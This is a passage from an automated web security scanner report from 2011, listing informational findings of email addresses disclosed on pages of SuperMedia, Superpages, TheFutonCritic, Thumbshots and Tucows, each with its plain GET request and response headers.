Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Unlimited Online Stores for Ecommerce | SuperMedia.com</title>



...[SNIP]...
</a>Email Addresses (name@yourbusiness.com)</div>
...[SNIP]...

23.133. https://www.supermedia.com/help/web-hosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/web-hosting

Issue detail

The following email address was disclosed in the response:

Request

GET /help/web-hosting HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:35:09 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Web Site Hosting Help | SuperMedia.com Advertising</title>



...[SNIP]...
<br>
You may want a separate email for each employee, or just a few addresses for things like info@web-address.com or sales@web-address.com.</p>
...[SNIP]...

23.134. https://www.supermedia.com/press  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /press

Issue detail

The following email address was disclosed in the response:

Request

GET /press HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Press Releases | SuperMedia.com Advertising</title>



...[SNIP]...
<a href="mailto:andrew.shane@idearc.com">
...[SNIP]...

23.135. https://www.supermedia.com/spportal/spportalFlow.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The following email address was disclosed in the response:

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_c1C850D3B-7918-8B5A-3A7C-12FE24C8265C_kE80B27E8-61A2-6AF8-1D53-97B5D03465C5 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/support/contact-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296764274|check#true#1296762474; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:46:31 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 33099


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Client Service Contacts | SuperMedia.com Advertising</title>



...[SNIP]...
<a href="mailto:winterclosing@supermedia.com">
...[SNIP]...

23.136. https://www.supermedia.com/trust/privacy-security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /trust/privacy-security

Issue detail

The following email address was disclosed in the response:

Request

GET /trust/privacy-security HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Privacy Policy | SuperMedia.com Advertising</title>



...[SNIP]...
<br>
If you have any questions about security on This Website, you can send us an email at spinfo@SuperMedia.com or contact Client Care at 1- 800-555-4833, Monday-Friday, 7am to 8pm CST. </p>
...[SNIP]...

23.137. https://www.supermedia.com/trust/terms-of-use  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /trust/terms-of-use

Issue detail

The following email address was disclosed in the response:

Request

GET /trust/terms-of-use HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Terms of Use | SuperMedia.com Advertising</title>



...[SNIP]...
<br>
Email: dmcanotices@supermedia.com <br>
...[SNIP]...

23.138. http://www.superpages.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:12 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:12 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td>
...[SNIP]...

23.139. http://www.superpages.com/superguarantee/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /superguarantee/

Issue detail

The following email address was disclosed in the response:

Request

GET /superguarantee/ HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:25 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:25 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h
...[SNIP]...
<td width="260" height="32">We are unable to provide information regarding your account to xxx@proxymail.facebook.com</td>
...[SNIP]...

23.140. http://www.thefutoncritic.com/devwatch/wright-vs-wrong/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefutoncritic.com
Path:   /devwatch/wright-vs-wrong/x22

Issue detail

The following email address was disclosed in the response:

Request

GET /devwatch/wright-vs-wrong/x22 HTTP/1.1
Host: www.thefutoncritic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kzhsyk55h14dmof1ovtfne55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:29:43 GMT
Connection: close
Content-Length: 20828

<html>
<head>
<title>Shows A-Z - wright vs wrong on abc | TheFutonCritic.com</title>
<meta id="Meta_Description" name="Description" content="wright vs wrong on abc ... TheFutonCritic.com has wright
...[SNIP]...
<a href="mailto:letters@thefutoncritic.com">
...[SNIP]...

23.141. http://www.thumbshots.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thumbshots.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.thumbshots.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30; expires=Thu, 14-Apr-2011 07:04:21 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:24:21 GMT
Content-Length: 56465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="mailto:sales@smartdevil.com?subject=Opportunities at Thumbshots.com">
...[SNIP]...

23.142. http://www.thumbshots.com/Community.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thumbshots.com
Path:   /Community.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Community.aspx HTTP/1.1
Host: www.thumbshots.com
Proxy-Connection: keep-alive
Referer: http://www.thumbshots.com/Home.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:17 GMT
Content-Length: 42954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="mailto:sales@smartdevil.com?subject=Opportunities at Thumbshots.com">
...[SNIP]...

23.143. http://www.thumbshots.com/Community/Feedback.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thumbshots.com
Path:   /Community/Feedback.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Community/Feedback.aspx HTTP/1.1
Host: www.thumbshots.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: language=en-US; .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 122824
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:30:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="mailto:sales@smartdevil.com?subject=Opportunities at Thumbshots.com">
...[SNIP]...

23.144. http://www.thumbshots.com/Community/SuccessStories.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thumbshots.com
Path:   /Community/SuccessStories.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Community/SuccessStories.aspx HTTP/1.1
Host: www.thumbshots.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: language=en-US; .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49551
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:30:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="mailto:sales@smartdevil.com?subject=Opportunities at Thumbshots.com">
...[SNIP]...

23.145. http://www.thumbshots.com/Home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thumbshots.com
Path:   /Home.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Home.aspx HTTP/1.1
Host: www.thumbshots.com
Proxy-Connection: keep-alive
Referer: http://www.thumbshots.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:15 GMT
Content-Length: 56462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="mailto:sales@smartdevil.com?subject=Opportunities at Thumbshots.com">
...[SNIP]...

23.146. http://www.thumbshots.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thumbshots.com
Path:   /Resources/Shared/scripts/DotNetNukeAjaxShared.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Resources/Shared/scripts/DotNetNukeAjaxShared.js HTTP/1.1
Host: www.thumbshots.com
Proxy-Connection: keep-alive
Referer: http://www.thumbshots.com/
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30; language=en-US

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sat, 06 Nov 2010 18:57:43 GMT
Accept-Ranges: bytes
ETag: "80edfd7de47dcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:24:28 GMT
Content-Length: 10101

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this softwar
...[SNIP]...
<history>
   ''' Version 1.0.0: Feb. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' Version 1.0.1: Oct. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' </history>
...[SNIP]...

23.147. http://www.thumbshots.com/Resources/Shared/scripts/widgets.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thumbshots.com
Path:   /Resources/Shared/scripts/widgets.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Resources/Shared/scripts/widgets.js HTTP/1.1
Host: www.thumbshots.com
Proxy-Connection: keep-alive
Referer: http://www.thumbshots.com/
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30; language=en-US

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sat, 06 Nov 2010 18:57:43 GMT
Accept-Ranges: bytes
ETag: "80edfd7de47dcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:24:29 GMT
Content-Length: 11495

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and as
...[SNIP]...
<history>
''' Version 1.0.0: Oct. 16, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
''' </history>
...[SNIP]...

23.148. http://www.thumbshots.com/Support.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thumbshots.com
Path:   /Support.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Support.aspx HTTP/1.1
Host: www.thumbshots.com
Proxy-Connection: keep-alive
Referer: http://www.thumbshots.com/Home.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:28:18 GMT
Content-Length: 42398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="mailto:sales@smartdevil.com?subject=Opportunities at Thumbshots.com">
...[SNIP]...

23.149. http://www.thumbshots.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thumbshots.com
Path:   /default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /default.aspx HTTP/1.1
Host: www.thumbshots.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: language=en-US; .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 56309
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:30:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="mailto:sales@smartdevil.com?subject=Opportunities at Thumbshots.com">
...[SNIP]...

23.150. http://www.thumbshots.com/privacy.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thumbshots.com
Path:   /privacy.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy.aspx HTTP/1.1
Host: www.thumbshots.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: language=en-US; .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36641
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:30:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="mailto:support@smartdevil.com">support@smartdevil.com</a>
...[SNIP]...

23.151. http://www.thumbshots.com/terms.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thumbshots.com
Path:   /terms.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /terms.aspx HTTP/1.1
Host: www.thumbshots.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: language=en-US; .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53533
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:30:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<br>
SERVICE CONTACT : support@smartdevil.com<br>
...[SNIP]...

23.152. http://www.tucows.com/advertise.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The following email address was disclosed in the response:

Request

GET /advertise.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
